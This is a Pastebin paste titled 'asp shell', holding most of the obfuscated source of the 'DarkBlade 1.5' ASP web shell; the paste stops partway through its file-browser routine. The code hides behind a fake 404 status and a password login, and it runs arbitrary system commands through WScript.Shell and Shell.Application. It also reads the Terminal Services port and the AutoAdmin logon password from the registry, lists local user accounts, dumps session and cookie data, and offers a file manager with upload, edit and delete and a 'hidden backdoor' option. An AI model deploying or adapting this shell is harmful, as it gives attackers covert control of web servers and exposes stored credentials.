Advertisement
Guest User

asp shell

a guest
Jan 31st, 2018
487
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASP 99.51 KB | None | 0 0
  1. <%@ LANGUAGE='VBScript' CODEPAGE='65001'%>
  2. <%
  3. Response.Buffer=True
  4. Response.Clear
  5. Response.CharSet="utf-8"
  6. Server.ScriptTimeOut=300
  7. '-------------------------------Config-------------------------------
  8. Const pass="C5E83EDF778C18482D84D5489B8D8F"'admin
  9. Const pipu=True
  10. Const iycew=59
  11. Const ydnj=False
  12. Const csj="_"
  13. Const jsrfr="lqbip|rcvdh|ihyn|ihk|ybgqm|aiw|gwk|qmkq|rxg|jksfh|geww|vgm|ulz|jqj|nyf|sesq|ugxyt|pnu|czwfq|yvquw|wckz|uwrty"
  14. Const amb="login"
  15. Const alqp="GB2312"
  16. Const dxpm="asp|asa|cer|cdx"
  17. Const mhla="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"
  18. Const nhbqw=50
  19. Const echs="zzzzzzzz.html"
  20. Const aerq=False
  21. '-------------------------------Config-------------------------------
  22. Dim goaction,lqbip,ihyn,ihk,aiw,gwk,lkyy,iuwq,vnznl,xjab,zjhor,nun,wbxx,cngn,ogfim,rfaq,vfo,nzax,zhyko,mkew,qmkq,ads,ajto,xdmm,rcvdh,ujcmu,qtylw,dqc,rqszr,iij,ogda,exte,mhvec,acjdi,conn,rxg,fkho,bondh,podw,mpj,qebjx,jksfh,geww,jdvf,vgm,ulz,kurmq,jqj,gmhi,nyf,qrqg,zqps,ubql,znx,gtt,ertns,mt,sesq,czwfq,ugxyt,pnu,nuatb,ytusx,pwab,dgj,ybgqm,mvvi,wseta,fjjxv,xjmb,irbw,rke,rhnw,glw,wannd,ldcr,tbe,oth,kylxz,uwdvh,ccnh,nuser,npass,wtpog,pgvr,yvquw,wckz,qqp,ryfj,vujc,uwrty,ktg,ghpc,lqog
  23. mvvi="DarkBlade 1.5 Sex OverLord Edition"
  24. wseta="DarkBlade"
  25. fjjxv="DarkB"++"ladePa"+rtoqv+"ss"
  26. dxoes()
  27. nnam()
  28. uwdvh=jnph()
  29. If Not uwdvh And goaction<>amb Then grh()
  30. If aerq And Trim(ramoi("AUT"+meeeq+"H_USER"))="" Then
  31. Response.Status="401 Unautho"+zcuti+"rized"
  32. Response.Addheader"WWW-AuThen"+zln+"ticate","BASIC"
  33. If ramoi("AUT"+meeeq+"H_USER")=""Then Response.End()
  34. End If
  35. Select Case goaction
  36. Case amb
  37. jnnby()
  38. Case"bapis"
  39. lrnyc()
  40. Case"eyb"
  41. yzj()
  42. Case"fbk"
  43. ptib()
  44. Case"zzajv"
  45. ojyen()
  46. Case"rwumm"
  47. wbmfm()
  48. Case"lfx"
  49. yvs()
  50. Case"kbqxz"
  51. awsr()
  52. Case"gbe"
  53. nvkq()
  54. Case"dkdl"
  55. srxtf()
  56. Case"ide"
  57. xibim()
  58. Case"rcjqh"
  59. aum()
  60. Case"Logout"
  61. mddep()
  62. Case"jzp"
  63. jmqbw()
  64. Case"jilq","veerr"
  65. fevyb()
  66. Case Else
  67. fevyb()
  68. End Select
  69. viwe
  70. Sub dxoes()
  71. If Not ydnj Then On Error Resume Next
  72. rfaq=Timer()
  73. Dim kue,fri,egpnh,zfmf,didec,ubizz,zpsji,qowkf
  74. servurl=ramoi("URL")
  75. Set iuwq=nfffq("MSXML"+ifdg+"2.XM"+swww+"LHTTP")
  76. Set vnznl=nfffq("WS"+qkdx+"cript.She"+nomr+"ll")
  77. Set xjab=nfffq("Scriptin"+xfw+"g.FileSystemObj"+znlfx+"ect")
  78. Set zjhor=nfffq("She"+nlrnz+"ll.Applic"+oqzje+"ation")
  79. If Not IsObject(vnznl)Then Set vnznl=nfffq("WS"+qkdx+"cript.She"+nlrnz+"ll.1")
  80. If Not IsObject(zjhor)Then Set zjhor=nfffq("She"+nlrnz+"ll.Applic"+oqzje+"ation.1")
  81. Set wbxx=new RegExp
  82. wbxx.Global=True
  83. wbxx.IgnoreCase=True
  84. wbxx.MultiLine=True
  85. lkyy=ramoi("SERVER_NAME")
  86. cngn=ramoi("PATH_INFO")
  87. ogfim=Lcase(zsz(cngn,"/"))
  88. nzax=wxw(".")
  89. zhyko=wxw("/")
  90. ujcmu=1
  91. ads=1
  92. Response.status="404 Not Found"
  93. End Sub
  94. Sub nnam()
  95. If Not ydnj Then On Error Resume Next
  96. For Each fri in request.queryString
  97. execute fri&"=request.queryString("""&fri&""")"
  98. Next
  99. If InStr(ramoi("CONTENT_TYPE"),"multipart/form-data")>=1 Then
  100. Set pgvr=new upload_5xsoft
  101. For Each egpnh in pgvr.xgqlo
  102. execute egpnh&"=pgvr.Form("""&egpnh&""")"
  103. Next
  104. Else
  105. For Each kue in request.Form
  106. execute kue&"=request.form("""&kue&""")"
  107. Next
  108. End If
  109. qowkf=Split(jsrfr,"|")
  110. For Each zpsji in qowkf
  111. execute""&zpsji&"=mdez("&zpsji&")"
  112. Next
  113. lqbip=Replace(lqbip,"/","\")
  114. If Right(lqbip,1)="\"And Len(lqbip)>3 Then lqbip=Left(lqbip,Len(lqbip)-1)
  115. End Sub
  116. Sub viwe()
  117. If Not ydnj Then On Error Resume Next
  118. Dim ocmv
  119. iuwq.abort
  120. Set iuwq=Nothing
  121. Set vnznl=Nothing
  122. Set xjab=Nothing
  123. Set zjhor=Nothing
  124. Set wbxx=Nothing
  125. vfo=timer()
  126. ocmv=vfo-rfaq
  127. echo"<br></td></tr></table>"
  128. mwt gmhi
  129. sodx"100%"
  130. echo"<tr class=""head"">"
  131. echo"<td>"
  132. mwt mkew
  133. ocmv=FormatNumber(ocmv,5)
  134. If Left(ocmv,1)="."Then ocmv="0"&ocmv
  135. mwt"<br>"
  136. echo"<div align=right>Processed in :"&ocmv&"seconds</div></td></tr></table></body></html>"
  137. Response.End()
  138. End Sub
  139. Sub jnnby()
  140. If Not ydnj Then On Error Resume Next
  141. dgj=request("dgj")
  142. If dgj<>""Then
  143. dgj=wucql(dgj)
  144. If wucql(dgj)=pass Then
  145. suzn fjjxv,dgj
  146. Response.Redirect(cngn)
  147. Else
  148. yln"Fuck you,get out!"
  149. End If
  150. End If
  151. ajg"Login"
  152. echo"<center><br>"
  153. cxaqj False
  154. echo"<p><b>Password : </b>"
  155. zesc"password","dgj","","30",""
  156. echo" "
  157. qjr"Get In"
  158. echo"</p></center></form>"
  159. End Sub
  160. Sub yvs()
  161. If Not ydnj Then On Error Resume Next
  162. Dim i,iijs,slq,gth,asp,wgmiu,zvwg,kodk,iqg,oons
  163. gth="Sy"+kyirr+"stemRoot|WinD"+lir+"ir|Com"+tboq+"Spec|TEMP|TMP|NUMBER_OF_PR"+smeb+"OCESSORS|OS|Os2LibP"+vxg+"ath|Path|PA"+nfrfd+"THEXT|PROCESSOR_ARCHITECTU"+tyvg+"RE|"&_
  164. "PROCESSOR_IDENTIf"+wvld+"IER|PROCE"+zuwbp+"SSOR_LEVEL|PROCE"+ihhir+"SSOR_REVISION"
  165. slq=Split(gth,"|")
  166. execute "Set iijs=vnznl.Environ"&ajjwi&"ment(""SYSTEM"")"
  167. asp=ramoi("NUMBER_OF_PR"+smeb+"OCESSORS")
  168. If IsNull(asp)Or asp=""Then
  169. asp=iijs("NUMBER_OF_PR"+smeb+"OCESSORS")
  170. End If
  171. zvwg=ramoi("OS")
  172. If IsNull(zvwg)Or zvwg=""Then
  173. zvwg=iijs("OS")
  174. End If
  175. wgmiu=iijs("PROCESSOR_IDENTIf"+wvld+"IER")
  176. ajg"Server Infomation"
  177. sodx"100%"
  178. vhl
  179. echo"<td colspan=""2""align=""center"">"
  180. echo"<b>Server parameters:</b>"
  181. echo"</td>"
  182. uemp
  183. abxky 0
  184. ycd"Server Name:"
  185. doTd lkyy,""
  186. uemp
  187. abxky 1
  188. ycd"Server IP:"
  189. doTd ramoi("LOCAL_ADDR"),""
  190. uemp
  191. abxky 0
  192. ycd"Server Port:"
  193. doTd ramoi("SERVER_PORT"),""
  194. uemp
  195. abxky 1
  196. ycd"Server Mem"+ugie+"ory"
  197. execute "doTd kxyzh(zjhor.GetSystemInformati"&gap&"on(""PhysicalMemoryInstalled"")),"""""
  198. uemp
  199. abxky 0
  200. ycd"Server Time"
  201. doTd Now,""
  202. uemp
  203. abxky 1
  204. ycd"Server Engine"
  205. doTd ramoi("SERVER_SOFTWARE"),""
  206. uemp
  207. abxky 0
  208. ycd"Script Timeout"
  209. doTd Server.ScriptTimeout,""
  210. uemp
  211. abxky 1
  212. ycd"Number of Cpus"
  213. doTd asp,""
  214. uemp
  215. abxky 0
  216. ycd"Info of Cpus"
  217. doTd wgmiu,""
  218. uemp
  219. abxky 1
  220. ycd"Server OS"
  221. doTd zvwg,""
  222. uemp
  223. abxky 0
  224. ycd"Server Script Engine"
  225. doTd ScriptEngine&"/"&ScriptEngineMajorVersion&"."&ScriptEngineMinorVersion&"."&ScriptEngineBuildVersion,""
  226. uemp
  227. abxky 1
  228. ycd"File's Full Path"
  229. doTd ramoi("PATH_TRANSLATED"),""
  230. uemp
  231. ads=0
  232. For i=0 To UBound(slq)
  233. abxky ads
  234. doTd slq(i)&":",""
  235. execute "doTd vnznl.ExpandEnvironm"&qfm&"entStrings(""%""&slq(i)&""%""),"""""
  236. uemp
  237. nrf
  238. Next
  239. guenn
  240. tvnm(Err)
  241. echo"<br>"
  242. Set iijs=Nothing
  243. Dim wdh
  244. sodx"100%"
  245. vhl
  246. echo"<td colspan=""6""align=""center"">"
  247. echo"<b>Info of disks</b>"
  248. echo"</td>"
  249. uemp
  250. abxky 0
  251. doTd"Driver letter",""
  252. doTd"Type",""
  253. doTd"Label",""
  254. doTd"File system",""
  255. doTd"Space left",""
  256. doTd"Total space",""
  257. uemp
  258. ads=1
  259. For Each wdh in xjab.Drives
  260. Dim vlpsj,xcmiw,tjx,ssfrt,pdl,nrr
  261. vlpsj=wdh.DriveLetter
  262. If Lcase(vlpsj)<>"a"Then
  263. xcmiw=ixuog(wdh.DriveType)
  264. tjx=wdh.VolumeName
  265. ssfrt=wdh.Filesystem
  266. pdl=kxyzh(wdh.FreeSpace)
  267. execute "nrr=kxyzh(wdh.Total"&vnkh&"Size)"
  268. abxky ads
  269. doTd vlpsj,""
  270. doTd xcmiw,""
  271. doTd tjx,""
  272. doTd ssfrt,""
  273. doTd pdl,""
  274. doTd nrr,""
  275. uemp
  276. End If
  277. vlpsj=""
  278. xcmiw=""
  279. tjx=""
  280. ssfrt=""
  281. pdl=""
  282. nrr=""
  283. nrf
  284. Next
  285. guenn
  286. tvnm(Err)
  287. Set wdh=Nothing
  288. Dim oia
  289. Set oia=xjab.GetFolder(zhyko)
  290. echo"<br>"
  291. sodx"100%"
  292. vhl
  293. echo"<td colspan=""2""align=""center"">"
  294. echo"<b>Info of site:</b>"
  295. echo"</td>"
  296. uemp
  297. abxky 0
  298. doTd"Physic"+iymx+"al path:",""
  299. doTd zhyko,""
  300. uemp
  301. abxky 1
  302. doTd"Current size:",""
  303. doTd kxyzh(oia.Size),""
  304. uemp
  305. abxky 0
  306. doTd"File count:",""
  307. doTd oia.Files.Count,""
  308. uemp
  309. abxky 1
  310. doTd"Folder count:",""
  311. doTd oia.SubFolders.Count,""
  312. uemp
  313. guenn
  314. tvnm(Err)
  315. mwt"<br>"
  316. Dim wsqws,rgcdn,twmf
  317. Dim eyn,eedi,vlpsk,phr
  318. kodk="HKEY_LOCAL_MACHINE\SYSTEM\Curre"+fewse+"ntControlSet\Control\Te"+iptg+"rminal Server\Win"+flu+"Stations\RDP-"+geks+"Tcp\"
  319. iqg="PortNumber"
  320. oons=knf(kodk&iqg)
  321. If oons=""Then oons="Can't get Te"+iptg+"rminal port.<br/>"
  322. wsqws="HK"+xoncv+"LM\SOFTW"+wjw+"ARE\Microsoft\Window"+zfd+"s NT\Curren"+suctf+"tVersion\Winlog"+sdxq+"on\"
  323. eedi="AutoAdmin"+itn+"Logon"
  324. rgcdn="Def"+lvgli+"aultUserName"
  325. twmf="Defaul"+zhisp+"tPassword"
  326. eyn=knf(wsqws&eedi)
  327. If eyn=0 Then
  328. vlpsk="Autologin isn't enabled"
  329. Else
  330. vlpsk=knf(wsqws&rgcdn)
  331. End If
  332. If eyn=0 Then
  333. phr="Autologin isn't enabled"
  334. Else
  335. phr=knf(wsqws&twmf)
  336. End If
  337. sodx"100%"
  338. vhl
  339. echo"<td colspan=""2""align=""center"">"
  340. echo"<b>Info of Te"+iptg+"rminal port&Autologin</b>"
  341. echo"</td>"
  342. uemp
  343. abxky 0
  344. doTd"Te"+iptg+"rminal port:",""
  345. doTd oons,""
  346. uemp
  347. abxky 1
  348. doTd"Autologin account:",""
  349. doTd vlpsk,""
  350. uemp
  351. abxky 0
  352. doTd"Autologin password:",""
  353. doTd phr,""
  354. uemp
  355. guenn
  356. echo"</ol>"
  357. tvnm(Err)
  358. End Sub
  359. Sub lrnyc()
  360. Dim i,dyb,dni,lxyvu
  361. dni="MS"+lip+"WC.AdRotator,MS"+lip+"WC.Bro"+orji+"wserType,MS"+lip+"WC.NextLink,MS"+lip+"WC.TOOLS,MS"+lip+"WC.Status,MS"+lip+"WC.Counters,IISS"+yflfn+"ample.ContentRo"+mui+"tator,IISS"+yflfn+"ample.PageCoun"+ppot+"ter,MS"+lip+"WC.Per"+sij+"missionChecker,Ad"+oge+"odb.Connecti"+wehbe+"on,SoftArti"+urok+"sans.File"+fqhws+"Up,SoftArti"+urok+"sans.FileMa"+mhlnt+"nager,LyfUpload.UploadFile,Per"+dsyh+"sits.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Per"+dsyh+"sits.Mailsender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer,IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArti"+urok+"sans.ImageGen,W3Image.Image,Scriptin"+xfw+"g.FileSystemObj"+znlfx+"ect,Ad"+oge+"odb.Str"+chut+"eam,She"+nlrnz+"ll.Applic"+oqzje+"ation,She"+nlrnz+"ll.Applic"+oqzje+"ation.1,WS"+qkdx+"cript.She"+nomr+"ll,WS"+qkdx+"cript.She"+nlrnz+"ll.1,WS"+qkdx+"cript.Network,hzhost.modules,npoint.host"
  362. lxyvu="Ad Rotator,Browser info,NextLink,,,Counters,Content rotator,,Permission checker,ADODB connection,SA-FileUp,SoftArtisans FileManager,LyfUpload,ASPUpload,Dimac upload,Dimac JMail,CDONTS SMTP mail,ASPemail,ASPmail,dkQmail,Geocel mail,IISmail,SmtpMail,SoftArtisans ImageGen,Dimac W3Image,FSO,Stream ,,,,,,Hzhost module,Npoint module"
  363. aryObjectList=Split(dni,",")
  364. aryDscList=Split(lxyvu,",")
  365. ajg"Server Object Detection"
  366. echo"Check for other ObjectId or ClassId.<br>"
  367. cxaqj True
  368. zesc"text","qmkq",qmkq,50,""
  369. echo" "
  370. qjr"Check"
  371. gbqwf
  372. If qmkq<>""Then
  373. yhigl
  374. Call btsva(qmkq,"")
  375. echo"</ul>"
  376. End If
  377. echo"<hr/>"
  378. echo"<ul class=""info""><li><u>Object name</u>Status and more</li>"
  379. For i=0 To UBound(aryDscList)
  380. Call btsva(aryObjectList(i),aryDscList(i))
  381. Next
  382. echo"</ul><hr/>"
  383. End Sub
  384. Sub yzj()
  385. Dim ogs,yyjd,gcy
  386. ajg"Users and Groups Imformation"
  387. Set gcy=getObj("WinNT://.")
  388. gcy.Filter=Array("User")
  389. csyfy"User",False
  390. sodx"100%"
  391. For Each ogs in gcy
  392. vhl
  393. echo"<td colSpan=""2""align=""center""><b>"&ogs.Name&"</b></td>"
  394. uemp
  395. etndu(ogs.Name)
  396. Next
  397. guenn
  398. echo"</span><br>"
  399. tvnm(Err)
  400. csyfy"UserGroup",False
  401. gcy.Filter=Array("Group")
  402. sodx"100%"
  403. ads=1
  404. For Each yyjd in gcy
  405. abxky ads
  406. doTd yyjd.Name,""
  407. doTd yyjd.Description,""
  408. uemp
  409. nrf
  410. Next
  411. guenn
  412. echo"</span>"
  413. tvnm(Err)
  414. End Sub
  415. Sub ptib()
  416. If Not ydnj Then On Error Resume Next
  417. Dim okvmb,wgd,dfm,wetzi
  418. If ajto<>""Then Session(ajto)=xdmm
  419. ajg"Server-Client Information"
  420. csyfy"ServerVariables",True
  421. sodx"100%"
  422. ads=1
  423. For Each dfm in Request.ServerVariables
  424. abxky ads
  425. ycd dfm
  426. doTd ramoi(dfm),""
  427. uemp
  428. nrf
  429. Next
  430. guenn
  431. mwt"</span><br>"
  432. csyfy"Application",True
  433. sodx"100%"
  434. ads=1
  435. For Each dfm in Application.Contents
  436. If dfm<>dhkcb("117_132_132_115_132_117_136_124")Then
  437. abxky ads
  438. ycd dfm
  439. doTd mszsa(Application(dfm)),""
  440. uemp
  441. nrf
  442. End If
  443. Next
  444. guenn
  445. mwt"</span><br>"
  446. csyfy"Session",True
  447. echo"<br>(ID"&Session.SessionId&")"
  448. sodx"100%"
  449. ads=1
  450. For Each dfm in Session.Contents
  451. wetzi=Session(dfm)
  452. abxky ads
  453. ycd dfm
  454. doTd mszsa(wetzi),""
  455. uemp
  456. nrf
  457. Next
  458. abxky ads
  459. cxaqj False
  460. fkv"Set Session","20%"
  461. echo"<td width=""80%""> Key :"
  462. zesc"text","ajto","",30,""
  463. echo"Value :"
  464. zesc"text","xdmm","",30,""
  465. echo"</td>"
  466. gbqwf
  467. uemp
  468. guenn
  469. mwt"</span><br>"
  470. csyfy"Cookies",True
  471. sodx"100%"
  472. ads=1
  473. For Each dfm in Request.Cookies
  474. If Request.Cookies(dfm).HasKeys Then
  475. For Each okvmb in Request.Cookies(dfm)
  476. abxky ads
  477. ycd dfm&"("&okvmb&")"
  478. doTd mszsa(Request.Cookies(dfm)(okvmb)),""
  479. uemp
  480. nrf
  481. Next
  482. Else
  483. abxky ads
  484. ycd dfm
  485. doTd mszsa(Request.Cookies(dfm)),""
  486. uemp
  487. nrf
  488. End If
  489. Next
  490. guenn
  491. echo"</span>"
  492. tvnm(Err)
  493. End Sub
  494. Sub ojyen()
  495. Dim inl,kob,swzr
  496. If Not ydnj Then On Error Resume Next
  497. ajg("WS"+qkdx+"cript.She"+nomr+"ll Execute")
  498. If rcvdh<>""Then
  499. If InStr(Lcase(rcvdh),"cmd")>0 And InStr(ihyn,"/c ")<1 Then
  500. kob=rcvdh&" /c "&ihyn
  501. Else
  502. kob=rcvdh&" "&ihyn
  503. End If
  504. If ldcr=1 Then
  505. execute "Set swzr=vnznl.Ex"&corg&"ec(kob)"
  506. execute "inl=swzr.StdOut.R"&pwbon&"eadAll()&vbCrLf&swzr.StdErr.R"&pwbon&"eadAll()"
  507. Else
  508. execute "vnznl.R"&gpkod&"un kob,0,False"
  509. End If
  510. tvnm(Err)
  511. zeb
  512. Else
  513. rcvdh="cmd.exe"
  514. End If
  515. sodx"100%"
  516. cxaqj True
  517. abxky 1
  518. doTd"Path","10%"
  519. iiit"text","rcvdh",rcvdh,"70%","",""
  520. echo"<td>"
  521. jwik"ldcr",1," View result ","checked"
  522. qjr"Run"
  523. echo"</td>"
  524. uemp
  525. abxky 0
  526. doTd"Parameters",""
  527. iiit"text","ihyn",ihyn,"","","2"
  528. uemp
  529. gbqwf
  530. guenn
  531. echo"<hr><b>Result:</b><br><span class=""alt1Span"">"&mszsa(inl)&"</span>"
  532. tvnm(Err)
  533. End Sub
  534. Sub wbmfm()
  535. If Not ydnj Then On Error Resume Next
  536. ajg("She"+nlrnz+"ll.Applic"+oqzje+"ation Execute")
  537. If rcvdh<>""Then
  538. If InStr(Lcase(rcvdh),"cmd")>0 And InStr(ihyn,"/c ")<1 Then
  539. ihyn="/c "&ihyn
  540. End If
  541. execute "zjhor.Shel"&poo&"lExecute rcvdh,ihyn,Null,""open"",0"
  542. tvnm(Err)
  543. ElseIf qtylw="viewResult" Then
  544. Response.Clear
  545. uwrty=Trim(uwrty)
  546. If IsObject(xjab)Then
  547. echo "<body bgcolor='#ecedef'>"&mszsa(tpcq(uwrty))&"</body>"
  548. Else
  549. echo "<body bgcolor='#ecedef'>"&mszsa(rchgv(uwrty))&"</body>"
  550. End If
  551. If Err Then echo Err.Description
  552. execute "xjab.Dele"&nbjk&"teFile uwrty,True"
  553. Response.End
  554. End If
  555. sodx"100%"
  556. cxaqj True
  557. abxky 1
  558. doTd"com"+nhmkc+"mand","10%"
  559. If rcvdh=""Then rcvdh="cmd.exe"
  560. If ihyn=""Then ihyn=" /c net u"+rmct+"ser > "&zhyko&"\temp.txt"
  561. iiit"text","rcvdh",rcvdh,"80%","",""
  562. fkv"Run ",""
  563. uemp
  564. abxky 0
  565. doTd"Parameters",""
  566. iiit"text","ihyn",ihyn,"","",2
  567. uemp
  568. gbqwf
  569. guenn
  570. echo"<hr>"
  571. zesc"button","","Refresh result","","onclick='javascript:thra()'"
  572. echo"<br><br><iframe id='inl' class='frame' frameborder='no'></iframe>"
  573. End Sub
  574. Sub fevyb()
  575. If Not ydnj Then On Error Resume Next
  576. If lqbip=""Then lqbip=gwk
  577. If lqbip=""Then lqbip=nzax
  578. If goaction<>"jilq"Then goaction="veerr"
  579. If qtylw="down"Then
  580. cqbv()
  581. Response.End()
  582. End If
  583. If goaction="veerr"Then
  584. iij="fso"
  585. ajg("FSO File Explorer")
  586. Else
  587. iij="sa"
  588. ajg("APP File Explorer")
  589. End If
  590. Select Case qtylw
  591. Case"dprl","eyq"
  592. usxi()
  593. lqbip=dzzx(lqbip,"\",False)
  594. Case"xhsy"
  595. xhsy()
  596. Case"save","evwr"
  597. yjzdg()
  598. lqbip=dzzx(lqbip,"\",False)
  599. Case"omtw"
  600. bhq()
  601. Case"unu","tzsaq"
  602. unu()
  603. Case"strwh","swxiy"
  604. ohcrx()
  605. lqbip=dzzx(lqbip,"\",False)
  606. Case"plz","wma","ttg","vseta"
  607. rumla()
  608. lqbip=dzzx(lqbip,"\",False)
  609. Case"rvvj"
  610. qcda()
  611. Case"lhirb"
  612. bizlp()
  613. lqbip=dzzx(lqbip,"\",False)
  614. Case"apicv"
  615. ozt()
  616. End Select
  617. If Len(lqbip)<3 Then lqbip=lqbip&"\"
  618. dslv()
  619. End Sub
  620. Sub dslv()
  621. Dim theFolder,slvd,ybft,gttt,nfplv,jrtca,acio,brwr,i
  622. If Not ydnj Then On Error Resume Next
  623. If iij="fso"Then
  624. Set theFolder=xjab.GetFolder(lqbip)
  625. gttt=xjab.GetParentFolderName(lqbip)
  626. Else
  627. execute "Set theFolder=zjhor.Nam"&urblr&"eSpace(lqbip)"
  628. ome Err
  629. gttt=dzzx(lqbip,"\",False)
  630. If InStr(gttt,"\")<1 Then
  631. gttt=gttt&"\"
  632. End If
  633. End If
  634. brwr=lqbip
  635. If Right(brwr,1)<>"\"Then brwr=brwr&"\"
  636. rtas"brwr",brwr
  637. cxaqj True
  638. echo"<b>Current Path :</b>"
  639. zesc"text","lqbip",lqbip,120,""
  640. mwt""
  641. rycpp"","170px","onchange=""javascript:if(this.value!=''){qjr('"&goaction&"','',this.value);}"""
  642. exhpr"","Drivers/Comm folders"
  643. exhpr mszsa(wxw(".")),"."
  644. exhpr mszsa(wxw("/")),"/"
  645. exhpr"","----------------"
  646. If Lcase(iij)="fso"Then
  647. For Each drive in xjab.Drives
  648. execute "exhpr drive.Drive"&jruor&"Letter&"":\"",drive.Drive"&jruor&"Letter&"":\"""
  649. Next
  650. exhpr"","----------------"
  651. End If
  652. exhpr"C:\Program Files","C:\Program Files"
  653. exhpr"C:\Program Files\RhinoSoft.com","RhinoSoft.com"
  654. exhpr"C:\Program Files\Serv"+shn+"-U","Serv"+shn+"-U"
  655. exhpr"C:\Program Files\Ra"+aumws+"dmin","Ra"+aumws+"dmin"
  656. exhpr"C:\Program Files\Microsoft SQL Server","Mssql"
  657. exhpr"C:\Program Files\Mysql","Mysql"
  658. exhpr"","----------------"
  659. exhpr"C:\documents and Settings\All Users","All Users"
  660. exhpr"C:\documents and Settings\All Users\documents","documents"
  661. exhpr"C:\documents and Settings\All Users\Application Data\Symantec\pcAnywhere","PcAnywhere"
  662. exhpr"C:\documents and Settings\All Users\Start Menu\Programs","Start Menu->Programs"
  663. exhpr"","----------------"
  664. exhpr"D:\Program Files","D:\Program Files"
  665. exhpr"D:\Serv"+shn+"-U","D:\Serv"+shn+"-U"
  666. exhpr"D:\Ra"+aumws+"dmin","D:\Ra"+aumws+"dmin"
  667. exhpr"D:\Mysql","D:\Mysql"
  668. ild
  669. qjr"Go"
  670. gbqwf
  671. mwt"<br><form method=""post"" id=""upform""action="""&cngn&"""enctype=""multipart/form-data"">"
  672. rtas"goaction",goaction
  673. rtas"qtylw","omtw"
  674. rtas"lqbip",lqbip
  675. sodx"60%"
  676. abxky 1
  677. iiit"file","upfile","","30%","",""
  678. doTd"Save As :","15%"
  679. iiit"text","yvquw","","30%","",""
  680. iiit"button",""," Upload  ","20%","onClick=""javascript:qjr('"&goaction&"','omtw','')""",""
  681. uemp
  682. gbqwf
  683. If iij="fso"Then
  684. abxky 0
  685. cxaqj True
  686. rtas"lqbip",lqbip
  687. rtas"qtylw","xhsy"
  688. iiit"text","exte","","","",""
  689. echo"<td colspan='2'>"
  690. zesc"radio","mhvec","file","","checked"
  691. echo"File"
  692. zesc"radio","mhvec","folder","",""
  693. echo"Folder</td>"
  694. fkv"New one",""
  695. gbqwf
  696. uemp
  697. End If
  698. echo"</table><hr>"
  699. If iij="fso"Then
  700. If Not xjab.FolderExists(lqbip)Then
  701. yln lqbip&" Folder dosen't exists or access denied!"
  702. viwe
  703. End If
  704. End If
  705. csyfy"Folders",False
  706. sodx"100%"
  707. vhl
  708. doTd"<b>Folder name</b>",""
  709. doTd"<b>Size</b>",""
  710. doTd"<b>Last modIfied</b>",""
  711. echo"<td><b>Action</b>"
  712. If iij="fso"Then
  713. echo" - "
  714. injj goaction,"apicv",clwc(lqbip),"Make a hidden backdoor here",""
  715. End If
  716. echo"</td>"
  717. uemp
  718. abxky 0
  719. echo"<td colspan=""4"">"
  720. injj goaction,"",clwc(gttt),"Parent Directory",""
  721. echo"</td>"
  722. uemp
  723. ads=1
  724. i=0
  725. If iij="fso"Then
  726. For Each objX in theFolder.SubFolders
  727. acio=objX.DateLastModIfied
  728. abxky ads
  729. echo"<td>"
  730. injj goaction,"",objX.Name,objX.Name,""
  731. echo"</td>"
  732. doTd mszsa("<dir>"),""
  733. doTd acio,""
  734. echo"<td>"
  735. injj goaction,"ttg",objX.Name,"Copy"," -"
  736. injj goaction,"vseta",objX.Name,"Move"," -"
  737. injj goaction,"swxiy",objX.Name,"Rename"," -"
  738. injj "jzp","jixpz",objX.Name,"Package"," -"
  739. injj goaction,"eyq",objX.Name,"Delete",""
  740. mwt"</td>"
  741. uemp
  742. nrf
  743. i=i+1
  744. If i>=20 Then
  745. i=0
  746. Response.Flush()
  747. End If
  748. Next
  749. Else
  750. For Each objX in theFolder.Items
  751. If objX.IsFolder Then
  752. acio=theFolder.GetDetailsOf(objX,3)
  753. abxky ads
  754. echo"<td>"
  755. injj goaction,"",objX.Name,objX.Name,""
  756. echo"</td>"
  757. doTd mszsa("<dir>"),""
  758. doTd acio,""
  759. echo"<td>"
  760. injj goaction,"swxiy",objX.Name,"Rename"," -"
  761. injj "jzp","kehl",objX.Name,"Package",""
  762. mwt"</td>"
  763. uemp
  764. nrf
  765. i=i+1
  766. If i>=20 Then
  767. i=0
  768. Response.Flush()
  769. End If
  770. End If
  771. Next
  772. End If
  773. guenn
  774. mwt"</span><br>"
  775. csyfy"Files",False
  776. sodx"100%"
  777. echo"<b>"
  778. vhl
  779. doTd"<b>File name</b>",""
  780. doTd"<b>Size</b>",""
  781. doTd"<b>Last modIfied</b>",""
  782. doTd"<b>Action</b>",""
  783. uemp
  784. echo"</b>"
  785. ads=0
  786. If iij="fso"Then
  787. For Each objX in theFolder.Files
  788. nfplv=kxyzh(objX.Size)
  789. acio=objX.DateLastModIfied
  790. If Lcase(Left(objX.Path,Len(zhyko)))<>Lcase(zhyko) Then
  791. slvd=""
  792. Else
  793. slvd=Replace(Replace(nwtcn(Mid(objX.Path,Len(zhyko)+1)),"%2E","."),"+","%20")
  794. End If
  795. abxky ads
  796. If slvd=""Then
  797. doTd objX.Name,""
  798. Else
  799. doTd"<a href='"&Replace(slvd,"%5C","/")&"' target=_blank>"&objX.Name&"</a>",""
  800. End If
  801. doTd nfplv,""
  802. doTd acio,""
  803. echo"<td>"
  804. injj goaction,"unu",objX.Name,"Edit"," -"
  805. injj goaction,"plz",objX.Name,"Copy"," -"
  806. injj goaction,"wma",objX.Name,"Move"," -"
  807. injj goaction,"strwh",objX.Name,"Rename"," -"
  808. injj goaction,"down",objX.Name,"Down"," -"
  809. injj goaction,"rvvj",objX.Name,"Attribute"," -"
  810. ozs "zwg",objX.Name,"","","","Database"," -"
  811. injj goaction,"dprl",objX.Name,"Delete",""
  812. mwt"</td>"
  813. uemp
  814. nrf
  815. i=i+1
  816. If i>=20 Then
  817. i=0
  818. Response.Flush()
  819. End If
  820. Next
  821. Else
  822. For Each objX in theFolder.Items
  823. If Not objX.IsFolder Then
  824. Dim sxip
  825. sxip=zsz(objX.Path,"\")
  826. jrtca=clwc(objX.Path)
  827. nfplv=theFolder.GetDetailsOf(objX,1)
  828. acio=theFolder.GetDetailsOf(objX,3)
  829. If Lcase(Left(objX.Path,Len(zhyko)))<>Lcase(zhyko) Then
  830. slvd=""
  831. Else
  832. slvd=Replace(Replace(nwtcn(Mid(objX.Path,Len(zhyko)+1)),"%2E","."),"+","%20")
  833. End If
  834. abxky ads
  835. If slvd=""Then
  836. doTd zsz(objX.Path,"\"),""
  837. Else
